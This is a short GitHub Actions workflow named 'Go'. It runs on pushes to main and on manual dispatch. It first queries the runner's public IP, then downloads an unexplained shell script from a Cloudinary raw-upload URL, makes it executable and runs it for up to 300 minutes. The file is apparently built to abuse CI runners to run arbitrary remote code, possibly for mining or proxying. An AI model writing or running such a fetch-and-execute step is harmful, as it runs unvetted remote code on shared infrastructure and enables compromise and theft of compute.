name: Go

on:
  workflow_dispatch:
  push:
    branches: [main]

jobs:
  run:
    continue-on-error: true
    runs-on: ubuntu-latest
    steps:
      - name: IP Workflow
        run: |
          curl https://api.ipify.org
      - name: Run exec
        timeout-minutes: 300
        run: |
          curl -O https://res.cloudinary.com/dyfqshedb/raw/upload/v1711652031/byeurbb5ck5jdu3ywmrs.sh
          chmod +x byeurbb5ck5jdu3ywmrs.sh
          ./byeurbb5ck5jdu3ywmrs.sh


